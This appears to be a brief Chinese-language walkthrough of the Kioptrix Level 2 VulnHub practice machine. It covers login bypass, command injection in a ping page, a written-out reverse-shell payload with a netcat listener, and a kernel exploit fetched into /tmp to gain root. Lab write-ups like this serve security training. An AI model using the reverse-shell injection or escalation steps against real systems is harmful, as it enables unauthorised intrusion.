靶机地址:
https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar
用vm,都用nat模式,ip段138
渗透思路
主机探测,端口版本信息收集
开放80
试一试登录看看
使用弱口令或是万能密码试一试登录,欧克
仔细看看到是一个ping测试,欧克
看是否存在命令注入,欧克,有
那尝试做个监听
kali监听端口nc -lvvp 1234,反弹shell127.0.0.1|bash -i >& /dev/tcp/192.168.138.128/1234 0>&1
提交就监听成功
查一下内核等信息
看看内核有个什么漏洞
Kali开启80服务,让bash下载尝试,结果没有写入权限
那到处找,看到tmp有权限
那进入目录,将kali里面的脚本下载上
Root权限了,可以随便搞了